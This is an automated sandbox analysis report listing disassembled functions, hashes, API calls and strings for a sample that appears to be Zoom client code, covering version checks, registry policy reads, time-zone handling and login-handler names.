                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5044a192a80746980db21c01ba220ec93fbd28091bfa3ad705ae68eac49b5958
                • Instruction ID: daf1fa5da5da7038d8031454fe5f02a63676027e103207b006bc1793283c3b93
                • Opcode Fuzzy Hash: 5044a192a80746980db21c01ba220ec93fbd28091bfa3ad705ae68eac49b5958
                • Instruction Fuzzy Hash: 1B117723F30C255A675C81698C1727A95D2DBD825071F533AE826E72C4E994DE13D290
                Function 00C685E0 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d080380e217779b5f84be989a9a4f41ad8b56c9c0cdb99ca6c8bd684d6193ad
                • Instruction ID: 61bacafac527f2ff94774d99dcf8a190cc47d8f58d3ec17c0acf6fe5c7915ea1
                • Opcode Fuzzy Hash: 2d080380e217779b5f84be989a9a4f41ad8b56c9c0cdb99ca6c8bd684d6193ad
                • Instruction Fuzzy Hash: 5CB092752043089FC300CE88D08094277E8AB19610F108076EA488B311D632B8519A95
                Function 00C5C800 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ab74c312b3255c18d9bbd93305a2b2a3d3371166a4cff521797bc4a79104259
                • Instruction ID: 79d1367ae391bf2cc4d44f4dd80b3c6bd0eb27e2a9208bfe3ba7622bab3e9909
                • Opcode Fuzzy Hash: 6ab74c312b3255c18d9bbd93305a2b2a3d3371166a4cff521797bc4a79104259
                • Instruction Fuzzy Hash: F0B0127520430C8F8300CF9CD0C0C0177ECEB1C7207505066FA098B311D231FC51DA94
                Function 00CACB50 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e68999e8f3c83aae77b3475a9970fccde5816ccb3fec5edab6e9180d5da75476
                • Instruction ID: f6072bcf5c85ef48470f13bec081ffc9fb933fd8869250231601fa778a43cec8
                • Opcode Fuzzy Hash: e68999e8f3c83aae77b3475a9970fccde5816ccb3fec5edab6e9180d5da75476
                • Instruction Fuzzy Hash: 81B09275104308AB8300DE88D140811BBE8AB58654714806AAA084B302E633F812CAD4
                Function 00C5CBD0 Relevance: .0, Instructions: 3COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e9bcbc2cbe3154230093a718128496b1e0d34c3dc8718325a25dec56985ce24
                • Instruction ID: 888bf515e6a0d17ab3417d77ad8d0f234f12070d925cb58d6639eeee8ae4efcc
                • Opcode Fuzzy Hash: 8e9bcbc2cbe3154230093a718128496b1e0d34c3dc8718325a25dec56985ce24
                • Instruction Fuzzy Hash:
                Function 00C68600 Relevance: .0, Instructions: 2COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ab011f3c062ee7639fc976f3fb0a9e47e1732ceccd91588fbd1b997de18e2e3
                • Instruction ID: 8d2b238e8ab9779fd1ee24186670f781e7bf5bc095627fca8fe1086e0dbe207c
                • Opcode Fuzzy Hash: 2ab011f3c062ee7639fc976f3fb0a9e47e1732ceccd91588fbd1b997de18e2e3
                • Instruction Fuzzy Hash:
                Function 00C5C9C0 Relevance: .0, Instructions: 2COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b29dbfec2aa8de6e100f41c1f6adce7d16bfbc6a18b10b175c7d0a9cd5e41d94
                • Instruction ID: 1c7530cb3a4ca137cb99cb688a131fe87ac67b328cb8781c33be93b6f57c70ca
                • Opcode Fuzzy Hash: b29dbfec2aa8de6e100f41c1f6adce7d16bfbc6a18b10b175c7d0a9cd5e41d94
                • Instruction Fuzzy Hash:
                Function 00C52CF0 Relevance: .0, Instructions: 1COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f4365c08eb74db0b3b49df71391612f75b5ef5d65ccebcef4567d277e6d04c6
                • Instruction ID: 0e279576e45c5771a5c4fd631f471fccf7c07b54fddb27d85e432a74eca785a3
                • Opcode Fuzzy Hash: 2f4365c08eb74db0b3b49df71391612f75b5ef5d65ccebcef4567d277e6d04c6
                • Instruction Fuzzy Hash:
                Function 00CD4250 Relevance: 75.6, APIs: 31, Strings: 12, Instructions: 338registrylibraryfileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1932 cd4250-cd42e2 SetDllDirectoryW call cd6150 call ce71d0 VerSetConditionMask * 4 VerifyVersionInfoW 1937 cd42f5-cd4353 VerSetConditionMask * 2 VerifyVersionInfoW 1932->1937 1938 cd42e4-cd42ef GetLastError 1932->1938 1939 cd46fc-cd4714 call ce4760 1937->1939 1940 cd4359-cd436c 1937->1940 1938->1937 1938->1939 1942 cd436e-cd4382 call ce4dfa 1940->1942 1943 cd43a3-cd43ae 1940->1943 1942->1943 1951 cd4384-cd43a0 call cdac10 call ce49df call ce4db0 1942->1951 1945 cd43e5-cd4431 call cd4720 * 2 LoadLibraryExW GetCurrentProcess OpenProcessToken 1943->1945 1946 cd43b0-cd43c4 call ce4dfa 1943->1946 1961 cd445a-cd4460 1945->1961 1962 cd4433-cd4455 GetTokenInformation 1945->1962 1946->1945 1956 cd43c6-cd43e2 call cda860 call ce49df call ce4db0 1946->1956 1951->1943 1956->1945 1965 cd4469-cd4491 RegOpenKeyExW 1961->1965 1966 cd4462-cd4463 CloseHandle 1961->1966 1962->1961 1970 cd4493-cd44d6 RegGetValueW RegCloseKey 1965->1970 1971 cd4502 1965->1971 1966->1965 1970->1971 1975 cd44d8-cd44dd 1970->1975 1973 cd450c-cd4512 1971->1973 1977 cd4679-cd468f call cd4a50 call cd3ee0 call cd4fc0 1973->1977 1978 cd4518-cd453f call ce71d0 SHGetSpecialFolderPathA 1973->1978 1979 cd44df-cd44e4 1975->1979 1980 cd44f6-cd4500 1975->1980 1996 cd46e4-cd46f9 call ce4760 1977->1996 1997 cd4691-cd46a0 GetModuleHandleW 1977->1997 1978->1977 1986 cd4545-cd4567 call cf9da4 1978->1986 1979->1980 1983 cd44e6-cd44f4 1979->1983 1980->1973 1983->1973 1992 cd457c-cd45d8 call cf9da4 CreateDirectoryA call cf9da4 CreateFileA 1986->1992 1993 cd4569-cd4575 1986->1993 2007 cd45eb-cd4610 CreateFileA 1992->2007 2008 cd45da-cd45e1 CloseHandle 1992->2008 1993->1992 2000 cd46df 1997->2000 2001 cd46a2-cd46be GetProcAddress * 2 1997->2001 2000->1996 2001->2000 2004 cd46c0-cd46c2 2001->2004 2004->2000 2006 cd46c4-cd46d7 ?Unlock@CState@Cmm@@QAEXXZ 2004->2006 2006->2000 2007->1977 2009 cd4612-cd4641 CreateSemaphoreW CreateEventW 2007->2009 2008->2007 2009->1977 2010 cd4643-cd4645 2009->2010 2010->1977 2011 cd4647-cd4666 CreateThread 2010->2011 2011->1977 2012 cd4668-cd4673 ResumeThread 2011->2012 2012->1977
                APIs
                • SetDllDirectoryW.KERNEL32(00D34CD0), ref: 00CD4271
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CD42A7
                • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00CD42B3
                • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00CD42BF
                • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00CD42CB
                • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00CD42DA
                • GetLastError.KERNEL32(?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD42E4
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00CD4330
                • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 00CD433C
                • VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 00CD434B
                • LoadLibraryExW.KERNEL32(cryptnet.dll,00000000,00000800,SOFTWARE\Microsoft\Cryptography\Defaults\Provider,Image Path,SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv,Dll,?,?,00000001,00000001,?,?,00000010,00000003), ref: 00CD440F
                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4422
                • OpenProcessToken.ADVAPI32(00000000,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4429
                • GetTokenInformation.ADVAPI32(0000011C,00000014(TokenIntegrityLevel),?,00000004,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD444D
                • CloseHandle.KERNEL32(?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4463
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Policies\Zoom\Zoom Meetings\General,00000000,00020019,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD4489
                • RegGetValueW.ADVAPI32(?,00000000,Disable3rdModuleVerify,0000FFFF,00000006,?,?,?,?,00000001,00000001,?,?,00000010,00000003), ref: 00CD44C2
                • RegCloseKey.ADVAPI32(?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD44CE
                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?,?,00000118,?,?), ref: 00CD4537
                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD4596
                • CreateFileA.KERNEL32(?,10000000,00000003,00000000,00000002,00000080,00000000), ref: 00CD45CA
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD45DB
                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD4602
                • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00CD461D
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CD4630
                • CreateThread.KERNEL32(00000000,00000000,00CD5F00,00DEF0D0,00000004,00000000), ref: 00CD4659
                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD4673
                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4696
                • GetProcAddress.KERNEL32(00000000,LdrRegisterDllNotification), ref: 00CD46A8
                • GetProcAddress.KERNEL32(00000000,LdrUnregisterDllNotification), ref: 00CD46B6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00CD5990,00DEF0D0,00DF1084,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD46D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ConditionCreateMask$CloseHandle$AddressDirectoryFileInfoOpenProcProcessThreadTokenVerifyVersion$Cmm@@CurrentErrorEventFolderInformationLastLibraryLoadModulePathResumeSemaphoreSpecialState@Unlock@Value
                • String ID: Disable3rdModuleVerify$Dll$Image Path$LdrRegisterDllNotification$LdrUnregisterDllNotification$SOFTWARE\Microsoft\Cryptography\Defaults\Provider$SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv$SOFTWARE\Policies\Zoom\Zoom Meetings\General$Zoom$\appsafecheck.txt$cryptnet.dll$ntdll.dll
                • API String ID: 2034110607-4142044431
                • Opcode ID: 36f42e122ea392333e4e62dd35d4c0f01dec6756de5dfede504e2967f62770b9
                • Instruction ID: 9cb2c6f15be481326e5a07ac1817614f0611d3fd5249372ae57bcaf1d11af36b
                • Opcode Fuzzy Hash: 36f42e122ea392333e4e62dd35d4c0f01dec6756de5dfede504e2967f62770b9
                • Instruction Fuzzy Hash: 77C1A3B4640300BFE7209F61EC4AF5A76E9AB44B11F00852AF755E63D0DBB0D689CB76
                Function 00CA0CA0 Relevance: 70.4, APIs: 13, Strings: 27, Instructions: 421registrytimeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA0CAA
                • GetDynamicTimeZoneInformation.KERNEL32(?), ref: 00CA0D02
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones,00000000,00020019,?), ref: 00CA0D25
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00CA0D56
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00CA0D69
                • RegCloseKey.ADVAPI32(?,?), ref: 00CA0D74
                • RegEnumKeyExW.ADVAPI32 ref: 00CA0E9B
                • RegCloseKey.ADVAPI32(?), ref: 00CA0EC5
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(UTC), ref: 00CA11EF
                Strings
                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones, xrefs: 00CA0D1B
                • Russia TZ 9 Standard Time, xrefs: 00CA106A
                • Israel Standard Time, xrefs: 00CA1162
                • Malay Peninsula Standard Time, xrefs: 00CA11AB
                • Jerusalem Standard Time, xrefs: 00CA112A
                • Russia TZ 4 Standard Time, xrefs: 00CA0F62
                • Russia TZ 6 Standard Time, xrefs: 00CA0FA4
                • Russian Standard Time, xrefs: 00CA0F58
                • Kaliningrad Standard Time, xrefs: 00CA0F16
                • North Asia Standard Time, xrefs: 00CA0FDC
                • Novosibirsk Standard Time, xrefs: 00CA116C
                • Coordinated Universal Time, xrefs: 00CA10AC
                • North Asia East Standard Time, xrefs: 00CA101E
                • Cabo Verde Standard Time, xrefs: 00CA10E8
                • @, xrefs: 00CA0E91
                • Std, xrefs: 00CA0E0A
                • UTC, xrefs: 00CA11E8
                • N. Central Asia Standard Time, xrefs: 00CA11A4
                • Russia TZ 2 Standard Time, xrefs: 00CA0F20
                • Vladivostok Standard Time, xrefs: 00CA10A2
                • Yakutsk Standard Time, xrefs: 00CA1060
                • Singapore Standard Time, xrefs: 00CA11E1
                • Cape Verde Standard Time, xrefs: 00CA1120
                • Ekaterinburg Standard Time, xrefs: 00CA0F9A
                • Russia TZ 7 Standard Time, xrefs: 00CA0FE6
                • Russia TZ 1 Standard Time, xrefs: 00CA0EDE
                • Russia TZ 8 Standard Time, xrefs: 00CA1028
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Assign@?$CloseCmm@@OpenString$DynamicEnumH_prolog3_InformationTimeZone
                • String ID: @$Cabo Verde Standard Time$Cape Verde Standard Time$Coordinated Universal Time$Ekaterinburg Standard Time$Israel Standard Time$Jerusalem Standard Time$Kaliningrad Standard Time$Malay Peninsula Standard Time$N. Central Asia Standard Time$North Asia East Standard Time$North Asia Standard Time$Novosibirsk Standard Time$Russia TZ 1 Standard Time$Russia TZ 2 Standard Time$Russia TZ 4 Standard Time$Russia TZ 6 Standard Time$Russia TZ 7 Standard Time$Russia TZ 8 Standard Time$Russia TZ 9 Standard Time$Russian Standard Time$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones$Singapore Standard Time$Std$UTC$Vladivostok Standard Time$Yakutsk Standard Time
                • API String ID: 3288993018-2998855980
                • Opcode ID: 4433579a4d892c54ba18c7e0cb63e38242226f85a74457b926d6d02345550d94
                • Instruction ID: 1a1b7958f76bbc3ccdec9c1de290ab9cc17062cf3225b444124b3ab0da0f0d4e
                • Opcode Fuzzy Hash: 4433579a4d892c54ba18c7e0cb63e38242226f85a74457b926d6d02345550d94
                • Instruction Fuzzy Hash: C7E1D6716002179ADB30AF91CC45BFA7276EF32B9CF5840A5DE19A6244E3339F85D760
                Function 00CB8200 Relevance: 59.6, APIs: 1, Strings: 33, Instructions: 87COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2156 cb8200-cb8233 call ce5365 2159 cb834a 2156->2159 2160 cb8239 2156->2160 2193 cb834f-cb835d call c58bfe call ce5333 2159->2193 2161 cb830b-cb8310 2160->2161 2162 cb824a-cb824f 2160->2162 2163 cb82cc-cb82d1 2160->2163 2164 cb8343-cb8348 2160->2164 2165 cb82c2-cb82c7 2160->2165 2166 cb8240-cb8245 2160->2166 2167 cb8286-cb828b 2160->2167 2168 cb8304-cb8309 2160->2168 2169 cb829a-cb829f 2160->2169 2170 cb82da-cb82df 2160->2170 2171 cb8319-cb831e 2160->2171 2172 cb825e-cb8263 2160->2172 2173 cb82d3-cb82d8 2160->2173 2174 cb8312-cb8317 2160->2174 2175 cb8290-cb8295 2160->2175 2176 cb8254-cb8259 2160->2176 2177 cb8268-cb826d 2160->2177 2178 cb82e8-cb82ed 2160->2178 2179 cb82ef-cb82f4 2160->2179 2180 cb82ae-cb82b3 2160->2180 2181 cb832e-cb8333 2160->2181 2182 cb82e1-cb82e6 2160->2182 2183 cb8320-cb8325 2160->2183 2184 cb8327-cb832c 2160->2184 2185 cb82a4-cb82a9 2160->2185 2186 cb82b8-cb82bd 2160->2186 2187 cb82fd-cb8302 2160->2187 2188 cb827c-cb8281 2160->2188 2189 cb833c-cb8341 2160->2189 2190 cb8272-cb8277 2160->2190 2191 cb82f6-cb82fb 2160->2191 2192 cb8335-cb833a 2160->2192 2161->2193 2162->2193 2163->2193 2164->2193 2165->2193 2166->2193 2167->2193 2168->2193 2169->2193 2170->2193 2171->2193 2172->2193 2173->2193 2174->2193 2175->2193 2176->2193 2177->2193 2178->2193 2179->2193 2180->2193 2181->2193 2182->2193 2183->2193 2184->2193 2185->2193 2186->2193 2187->2193 2188->2193 2189->2193 2190->2193 2191->2193 2192->2193
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: after_moduleloaded_handler$app_active$app_inactive$app_init_handler$app_login$app_login_handler$auim_loginreturn_handler$broadcast_sync_msg_handler$connect_status_update_handler$dns_connection$im_ready$init_appdata_handler$init_appui_handler$init_mainboard_handler$load_modules_handler$network_disconnect$network_state$ping_primary_domain$pk_primary_proxy_domain$prepare_xmpp_signon_handler$refresh_token$refresh_token_handler$sbpta_loginreturn_handler$sbptwss_loginreturn_handler$sign_and_safe_check$signoff$singup$singup_handler$ssl_connection$tcp_connection$undefined_login$xmpp_signon$xmpp_signon_handler
